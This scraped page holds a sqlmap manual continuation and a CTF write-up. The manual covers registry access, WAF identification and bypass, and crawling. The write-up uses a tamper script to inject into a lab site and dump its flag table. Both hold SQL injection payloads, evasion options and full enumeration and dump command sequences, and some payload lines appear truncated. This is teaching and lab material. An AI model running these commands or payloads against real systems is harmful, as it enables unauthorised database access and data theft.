get parameter not found / id is not injectable: what to do

sqlmap user manual [continued]
Source: Internet | Published: 10:37:58 | Author: anonymous
The previous article, "sqlmap user manual", covered most of the options you are likely to use but left some out; this post fills them in.
PS: Most of the sqlmap questions asked in the zone could be answered by reading that article from start to finish. Sadly, few people have the patience to read an article through any more: they hit a problem and immediately ask about that one problem, not realising how much time spent asking for help a careful read would save them later. Rant over, on to the content:
Windows registry access
Supported when the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the web application supports stacked queries. The database user sqlmap is connected as also needs the privileges required to operate on the registry.
Read a Windows registry key value
Option: --reg-read
Write a Windows registry key value
Option: --reg-add
Delete a Windows registry key value
Option: --reg-del
Auxiliary registry options
Options: --reg-key, --reg-value, --reg-data, --reg-type
These are used together with the three options above. Example:
$ python sqlmap.py -u "..." --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
General options
Load session from a stored SQLite file
sqlmap automatically creates an SQLite file under the output directory for every target; use this option to point it at a specific file to read the session from.
Log HTTP(S) traffic to a text file
This option takes a text file; sqlmap writes the log of HTTP(S) requests and responses there.
Never ask for user input, use the default behaviour
Option: --batch
With this option no user input is required; sqlmap keeps running using the default answer it would otherwise suggest at each prompt.
Force character encoding used for data retrieval
Option: --charset
Instead of the character encoding sqlmap detects automatically (for example from the Content-Type HTTP header), force a specific one, e.g.:
--charset=GBK
Crawl the website starting from the target URL
Option: --crawl
sqlmap can collect links that may be vulnerable; the value given is the crawling depth.
$ python sqlmap.py -u "..." --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]
Delimiting character used in CSV output
Option: --csv-del
When a dump is saved as CSV (--dump-format=CSV) a delimiter is needed; the default is a comma, and it can be changed, e.g.:
--csv-del=";"
DBMS authentication credentials
Option: --dbms-cred
Sometimes the current database user lacks the privileges for an operation and it fails. If you know the password of a higher-privileged user you can supply it with this option; some DBMSes have a dedicated mechanism for running as another user, such as the OPENROWSET function in Microsoft SQL Server.
Format of dumped data
Option: --dump-format
The output format can be set to CSV, HTML or SQLITE.
Display estimated time of arrival
Option: --eta
Computes the time remaining to retrieve the injected data.
For example, a boolean-based blind injection against Oracle:
$ python sqlmap.py -u "..." -b --eta
[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========>                                          ] 11/64  ETA 00:19
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
sqlmap first retrieves the output length, then shows the estimated completion time and the percentage done while it retrieves the characters.
Flush session file
Option: --flush-session
Use this option if you do not want to reuse the session file cached for this target; it clears the previous session and tests the target from scratch.
Parse and test forms automatically
Option: --forms
To test the parameters of a form on a page you can read the request from a file with -r or supply the data with --data, but with --forms sqlmap fetches the page at the -u URL and tests the forms it finds there automatically.
Ignore query results stored in the session file
Option: --fresh-queries
Ignore the query results saved in the session file and query again.
Use DBMS hex function(s) for data retrieval
Option: --hex
Character-encoding problems can sometimes lose data while it is retrieved; the DBMS hex function avoids this.
PostgreSQL example:
$ python sqlmap.py -u "..." --banner --hex -v 3 --parse-errors
[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type numeric: ":vtj:506f514c206f6ede2c96c632d342e332eed312e2e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]
Custom output directory path
Option: --output-dir
By default sqlmap stores session and result files under the output folder; this option sets a custom path, e.g. --output-dir=/tmp
Parse DBMS error messages from response pages
Option: --parse-errors
Sometimes the target has not disabled DBMS error reporting, so when a statement fails the error is returned in the page; this option makes sqlmap show the parsed error messages.
$ python sqlmap.py -u "..." --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
Miscellaneous options
Use short mnemonics
When the options get too long and complex you can use the short mnemonic form. For example:
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "..."
can be written as:
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "..."
and:
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "..."
can be written as:
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "..."
Alert when SQL injection is found
Option: --alert
Set the answers to questions
Option: --answers
Use this option to supply your own answers automatically when sqlmap prompts for input. Example:
$ python sqlmap.py -u "..." --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
[...]
Beep when SQL injection is found
Option: --beep
Beep when SQL injection is found.
Heuristically check for WAF/IPS/IDS protection
Option: --check-waf
A WAF/IPS/IDS can get in sqlmap's way considerably; if you suspect the target has one, use this option to test for it. sqlmap sends an injection test in a parameter that does not exist:
&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1
If protection is present, the response is likely to differ.
Clean up the DBMS from sqlmap specific UDF(s) and tables
Option: --cleanup
Remove the UDFs and tables created by sqlmap during injection.
Disable console output coloring
Option: --disable-coloring
sqlmap colours its output by default; this option turns colouring off.
Use Google dork results from a specified page number
Option: --gpage
By default sqlmap takes the first 100 result URLs for injection testing; with this option you can specify the results page whose URLs are tested.
Use HTTP parameter pollution
Option: --hpp
HTTP parameter pollution may bypass WAF/IPS/IDS protection mechanisms; it is particularly effective against the ASP/IIS and ASP.NET/IIS platforms.
Identify WAF/IPS/IDS protection
Option: --identify-waf
sqlmap can try to identify the WAF/IPS/IDS product in place so that the user can choose a suitable bypass; around 30 products are currently recognised.
For example, against a MySQL target protected by the ModSecurity WAF:
$ python sqlmap.py -u "..." --identify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
[...]
Imitate a smartphone through the HTTP User-Agent header
Option: --mobile
Sometimes the server only accepts requests from mobile clients; this option sets a smartphone User-Agent so that sqlmap looks like a phone.
$ python sqlmap.py -u "..." --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
Safely remove all content from the output directory
Option: --purge-output
Sometimes result files must be deleted so that they cannot be recovered; with this option the existing files are overwritten with random data before they are removed.
$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
Conduct thorough tests only if positive heuristic(s)
Option: --smart
When testing a very large number of target URLs, this option saves time by running the full injection tests only on parameters where the heuristic (error-based) check quickly indicates injection.
$ python sqlmap.py -u "..." --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
Simple wizard interface for beginner users
Option: --wizard
An option aimed at beginners: it walks you step by step through the input needed to test the target.
$ python sqlmap.py --wizard

    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:25:26
Please enter full target URL (-u):
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1
sqlmap is running, please wait..
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN () THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN () THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 :37
    Copyright (c) Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user:    'sa'
current database:    'testdb'
current user is DBA:    True
[*] shutting down at 11:25:52
Original link: http://drops.wooyun.org/tips/401
Simple SQL Injection 2 (WP)
Here we use a tamper script. Tamper scripts are written in Python and ship with sqlmap; their main purpose is to bypass a WAF. If spaces are filtered you can use space2comment.py, if the filter is case-sensitive you can use randomcase.py, and so on.
The procedure is the same as in Simple SQL Injection 3, only with --tamper added, so no screenshots; what follows is copied from my Kali terminal. The --level option used here sets the level of tests to perform (1-5, default 1). By default sqlmap tests all GET and POST parameters; when --level is 2 or higher it also tests the HTTP Cookie header values, and at 3 or higher also the User-Agent and HTTP Referer header values.
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" --level 2
{1.0-dev-nongit-} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:16:47
[21:16:47] [INFO] loading tamper script 'space2comment'
[21:16:47] [INFO] testing connection to the target URL
[21:16:47] [INFO] heuristics detected web page charset 'GB2312'
[21:16:47] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:16:47] [INFO] testing if the target URL is stable
[21:16:48] [INFO] target URL is stable
[21:16:48] [INFO] testing if GET parameter 'id' is dynamic
[21:16:48] [INFO] confirming that GET parameter 'id' is dynamic
[21:16:48] [INFO] GET parameter 'id' is dynamic
[21:16:48] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[21:16:48] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[21:16:48] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n] y
[21:16:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:16:54] [WARNING] reflective value(s) found and filtering out
[21:16:55] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[21:16:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:16:55] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[21:16:55] [INFO] testing 'MySQL inline queries'
[21:16:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[21:16:55] [WARNING] time-based comparison requires larger statistical model, please wait........
[21:16:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[21:16:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:16:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:16:55] [INFO] testing 'MySQL > 5.0.12 stacked queries (heavy query - comment)'
[21:16:55] [INFO] testing 'MySQL > 5.0.12 stacked queries (heavy query)'
[21:16:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[21:17:06] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
[21:17:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:17:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:17:07] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[21:17:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:17:09] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:17:09] [INFO] target URL appears to have 1 column in query
[21:17:10] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[21:17:10] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[21:17:10] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[21:17:12] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[21:17:16] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[21:17:17] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[21:17:19] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[21:17:21] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[21:17:22] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[21:17:23] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 242 HTTP(s) requests:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND
    AND 'lyjP'='lyjP

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqN

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND 'ByYo'='ByYo
[21:18:02] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:18:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:18:02] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ctf5.shiyanbar.com'
[*] shutting down at 21:18:02
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" --current-db
[*] starting at 21:18:22
[21:18:22] [INFO] loading tamper script 'space2comment'
[21:18:22] [INFO] resuming back-end DBMS 'mysql'
[21:18:23] [INFO] testing connection to the target URL
[21:18:23] [INFO] heuristics detected web page charset 'GB2312'
[21:18:23] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
[...]
[21:18:23] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:18:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:18:23] [INFO] fetching current database
[21:18:23] [INFO] retrieved: web1
current database: 'web1'
[21:18:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ctf5.shiyanbar.com'
[*] shutting down at 21:18:23
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" -D web10 --tables
[*] starting at 21:18:43
[21:18:43] [INFO] loading tamper script 'space2comment'
[21:18:43] [INFO] resuming back-end DBMS 'mysql'
[21:18:43] [INFO] testing connection to the target URL
[21:18:43] [INFO] heuristics detected web page charset 'GB2312'
[21:18:43] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
[...]
[21:18:43] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:18:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:18:43] [INFO] fetching tables for database: 'web10'
[21:18:43] [INFO] fetching number of tables for database 'web10'
[21:18:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:18:43] [INFO] retrieved:
[21:18:43] [WARNING] reflective value(s) found and filtering out
0
[21:18:53] [WARNING] database 'web10' appears to be empty
[21:18:53] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
[21:19:00] [INFO] checking table existence using items from '/usr/share/sqlmap/txt/common-tables.txt'
[21:19:00] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[21:19:03] [INFO] starting 10 threads
[21:20:37] [INFO] tried items (80%)
[21:20:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
[21:20:37] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[21:21:09] [WARNING] no table(s) found
No tables found
[21:21:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ctf5.shiyanbar.com'
[*] shutting down at 21:21:09
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" -D web1 --tables
[*] starting at 21:21:47
[21:21:47] [INFO] loading tamper script 'space2comment'
[21:21:48] [INFO] resuming back-end DBMS 'mysql'
[21:21:48] [INFO] testing connection to the target URL
[21:21:48] [INFO] heuristics detected web page charset 'GB2312'
[21:21:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
[...]
[21:21:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:21:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:21:48] [INFO] fetching tables for database: 'web1'
[21:21:48] [INFO] the SQL query used returns 2 entries
[21:21:48] [INFO] retrieved: flag
[21:21:48] [INFO] retrieved: web_1
Database: web1
[2 tables]
+-------+
| flag  |
| web_1 |
+-------+
[21:21:48] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’
[*] shutting down at 21:21:48
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" -D web1 -T flag --columns
[*] starting at 21:22:17
[21:22:17] [INFO] loading tamper script 'space2comment'
[21:22:17] [INFO] resuming back-end DBMS 'mysql'
[21:22:17] [INFO] testing connection to the target URL
[21:22:17] [INFO] heuristics detected web page charset 'GB2312'
[21:22:17] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
[...]
[21:22:17] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:22:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:22:17] [INFO] fetching columns for table 'flag' in database 'web1'
[21:22:17] [INFO] the SQL query used returns 2 entries
[21:22:17] [INFO] retrieved: flag
[21:22:17] [INFO] retrieved: char(30)
[21:22:18] [INFO] retrieved: id
[21:22:18] [INFO] retrieved: int(4)
Database: web1
Table: flag
[2 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| flag   | char(30) |
| id     | int(4)   |
+--------+----------+
[21:22:18] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’
[*] shutting down at 21:22:18
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" -D web1 -T flag -C flag --dump
[*] starting at 21:22:35
[21:22:35] [INFO] loading tamper script 'space2comment'
[21:22:35] [INFO] resuming back-end DBMS 'mysql'
[21:22:35] [INFO] testing connection to the target URL
[21:22:35] [INFO] heuristics detected web page charset 'GB2312'
[21:22:35] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
[...]
[21:22:35] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:22:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:22:35] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'web1'
[21:22:35] [INFO] the SQL query used returns 1 entries
[21:22:35] [INFO] retrieved: flag{_5O_dAmn_90Od}
[21:22:35] [INFO] analyzing table dump for possible password hashes
Database: web1
Table: flag
[1 entry]
+---------------------+
| flag                |
+---------------------+
| flag{_5O_dAmn_90Od} |
+---------------------+
[21:22:35] [INFO] table 'web1.flag' dumped to CSV file '/root/.sqlmap/output/ctf5.shiyanbar.com/dump/web1/flag.csv'
[21:22:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ctf5.shiyanbar.com'
[*] shutting down at 21:22:35
